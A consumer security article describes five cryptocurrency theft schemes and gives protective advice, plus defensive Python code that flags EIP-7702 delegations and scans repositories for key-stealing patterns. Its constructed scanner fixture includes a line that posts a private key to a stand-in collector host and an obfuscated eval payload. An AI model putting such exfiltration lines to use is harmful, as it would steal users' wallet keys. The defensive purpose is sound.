Scammers use a set of ready-made schemes to deceive unsuspecting cryptocurrency owners and obtain their assets

How your cryptocurrency will be stolen: top 5 popular schemes

01.10.2025


Every day, someone falls victim to scammers or hackers and loses their cryptocurrency. GetBlock AML Research has compiled a list of the most popular crypto asset theft schemes in recent times.

1. Fake hardware wallets

Recently, there have been more cases of people getting ripped off after buying fake hardware wallets. For example, one user bought a device called “imToken Secure Cold Wallet” from an unofficial seller for 618 yuan. As soon as they transferred 4.35 bitcoins to it, the money vanished.

Such scams do not require sophisticated technology — they are based on trust and psychological tricks. The essence is simple: fraudsters set up the wallet in advance, write down its secret code, and then sell the device as new. The buyer thinks they are in control of their money, but in reality, the attackers already have access to it.

Usually, the scheme works like this: criminals buy an original wallet, activate it, and write down the secret code (seed phrase). Then they change the instructions, put a fake card with the code inside, and reseal the package so that the device looks new. They sell it through social networks, streams, or second-hand goods platforms. Sometimes scammers simply put a card with a pre-printed code in the box, convincing the buyer that they need to restore the wallet using it. As a result, all the money that the person transfers goes straight into the hands of criminals.

To avoid being scammed:

  • Only buy such devices from official sellers.
  • Generate the secret code yourself, on the device, and never use ready-made cards with codes.
  • If there is a pre-written code in the box, this is a sure sign of a fake.
  • Always test a new wallet with a small amount first.
  • The main rule is that you only control your money when you create and store the secret code yourself.

2. Phishing via EIP-7702

There have been cases where people have lost all the money in their wallets due to a new scam. Here’s how it works: if criminals get hold of your private key (the main password to your wallet), they connect your address to a fake “contract.” From that moment on, all transfers are automatically redirected to the scammers. Even if you try to withdraw your coins, they will not go to you, but to the address of the attackers.

The main danger is that a person may not notice the trick — everything looks like a normal transaction. Therefore, you need to protect your private keys as much as possible and carefully check who and what you are authorizing before signing each transaction.
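EIP-7702 records the contract an account is connected to as a 23-byte delegation designator (0xef0100 followed by the contract address) in the account's code, so a wallet owner can check for it. The following is an added example, not code from the original article: it classifies hex strings as returned by the standard eth_getCode JSON-RPC call, and the addresses and the allowlist in it are constructed placeholders.

```python
# Added example: detect an EIP-7702 delegation in the code returned by eth_getCode.
DELEGATION_PREFIX = bytes.fromhex("ef0100")  # designator = 0xef0100 || 20-byte address

def classify_code(code_hex):
    """Return (kind, delegate) where kind is 'plain', 'delegated' or 'contract'."""
    raw = bytes.fromhex(code_hex[2:] if code_hex.lower().startswith("0x") else code_hex)
    if not raw:
        return ("plain", None)          # ordinary account, no code attached
    if len(raw) == 23 and raw.startswith(DELEGATION_PREFIX):
        return ("delegated", "0x" + raw[3:].hex())
    return ("contract", None)           # regular deployed contract

def audit(codes_by_address, trusted_delegates):
    """List (address, delegate) pairs whose delegate is not on the allowlist."""
    trusted = {a.lower() for a in trusted_delegates}
    findings = []
    for address, code_hex in codes_by_address.items():
        kind, delegate = classify_code(code_hex)
        if kind == "delegated" and delegate not in trusted:
            findings.append((address, delegate))
    return findings

# Constructed sample data: placeholder addresses, not real accounts.
KNOWN_GOOD = "0x" + "aa" * 20
SAMPLE_CODES = {
    "0x" + "11" * 20: "0x",                        # plain account
    "0x" + "22" * 20: "0xef0100" + "aa" * 20,      # delegated to an allowlisted contract
    "0x" + "33" * 20: "0xef0100" + "bb" * 20,      # delegated to an unknown contract
    "0x" + "44" * 20: "0x6080604052",              # ordinary contract bytecode
}

if __name__ == "__main__":
    for address, delegate in audit(SAMPLE_CODES, {KNOWN_GOOD}):
        print(f"{address} delegates to unrecognised contract {delegate}")
```

An address you own that reports a delegate you never authorized should be treated as compromised: the key that signed the delegation is known to someone else.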

3. Malicious projects on GitHub

Many cases of theft are associated with fake “open-source projects” on the Internet. GitHub is a platform where programmers post their code. Malicious actors pretend that their projects are popular and reliable, while hiding viruses inside.

For example:

One user downloaded a project with a bot for Solana. It turned out that the code secretly collected private keys and sent them to a fraudulent website.

In another project, there was a hidden function in the code that, when launched, extracted secrets from the settings file and sent them to attackers.

In the third case, a job candidate was asked to download a project “for a test assignment.” Hidden inside was a virus that collected data from browsers and crypto wallets and could execute commands from attackers.

Signs of forgery:

  • The project has many “stars” and “forks,” but the change history is short.
  • The code contains suspicious references to packages or programs that are not found in official sources.
  • The code is very confusing or hides functions that read private data.

To protect yourself, never run unknown code on a computer where you store money or passwords. Only do this in a separate, isolated environment.
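The last two signs can be checked by reading a downloaded project as text, without running it. The following is an added example, not code from the original article: the patterns are heuristic assumptions chosen for illustration, and the three sample files are constructed. A flagged file is a prompt for manual review, not proof of malice.

```python
import re

# Heuristic patterns (assumptions for this example, not a complete rule set).
RULES = {
    "secret-access": re.compile(
        r"private[_-]?key|seed[_-]?phrase|mnemonic|secret[_-]?key|\.env\b", re.I),
    "network-send": re.compile(
        r"requests\.post|urllib\.request|fetch\(|axios\.post|https?://", re.I),
    "obfuscation": re.compile(
        r"\beval\(|\bexec\(|b64decode|atob\(|[A-Za-z0-9+/]{80,}"),
}

def scan_text(text):
    """Return {rule_name: [line numbers]} for every rule that matches."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def triage(files):
    """files maps path -> source text. Return a report for flagged files only."""
    report = {}
    for path, text in files.items():
        hits = scan_text(text)
        # Key material and outbound traffic in one file is the pattern the article describes.
        exfil = "secret-access" in hits and "network-send" in hits
        if exfil or "obfuscation" in hits:
            report[path] = {"exfil_pattern": exfil, "hits": hits}
    return report

# Constructed sample repository, held as strings so nothing is ever executed.
SAMPLE_REPO = {
    "bot/config_loader.py": (
        "import os, requests\n"
        "key = os.environ.get('PRIVATE_KEY')\n"
        "requests.post('https://collector.example.invalid/log', json={'k': key})\n"
    ),
    "bot/strategy.py": "def next_order(price):\n    return price * 0.99\n",
    "bot/loader.js": "eval(atob(payload));\n",
}

if __name__ == "__main__":
    for path, verdict in triage(SAMPLE_REPO).items():
        print(path, verdict)
```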

4. Social engineering

Scammers actively use deception and psychological pressure. They may pretend to be employers, recruiters, or business partners.

Example: one user received a job offer from a supposedly well-known bank. He was invited to a chat, shown “plausible” links and videos. But upon verification, it turned out that the people’s profiles were fake, and the goal was to gain trust and trick the user into installing malicious software.

There are also complex schemes: attackers conduct entire “interviews” with a person to gain trust. In the end, they ask the victim to install a “camera driver” or “test program,” which turns out to be a virus that steals wallets.

There are also quick attacks: for example, the victim was rushing to a meeting and accidentally clicked on a fake Zoom link. As a result, the scammers gained access to her computer and replaced the transaction details, causing her to sign a money transfer directly to their address.

The main thing to remember is that such attacks only work when the person themselves begins to cooperate with the scammers. Therefore, always verify the identity of the people you are talking to and never install questionable programs.

5. Phishing sites

Fake websites that look like the real thing are very common. They most often appear through Google ads or old links on social media and forums.

Example: one user searched for the Aave service on Google and clicked on the first link. The website looked identical to the real one, but when the user signed the transaction, their wallet transferred control of their assets to the scammers. The losses amounted to over a million dollars.

Sometimes, attackers intercept old invitations to chats (for example, on Discord). The user thinks they have joined the official community, but in fact ends up in a fake group and gives away access to their assets.

There are also more cunning schemes: fake CAPTCHAs or “I am not a robot” buttons. After clicking, a malicious command is secretly copied to the computer, and the victim pastes it into the terminal themselves, without realizing that they are launching a virus.

The essence of these attacks is the same: to disguise a dangerous action as a familiar one. Therefore, it is important to use only trusted bookmarks and not to click on advertisements or suspicious links.
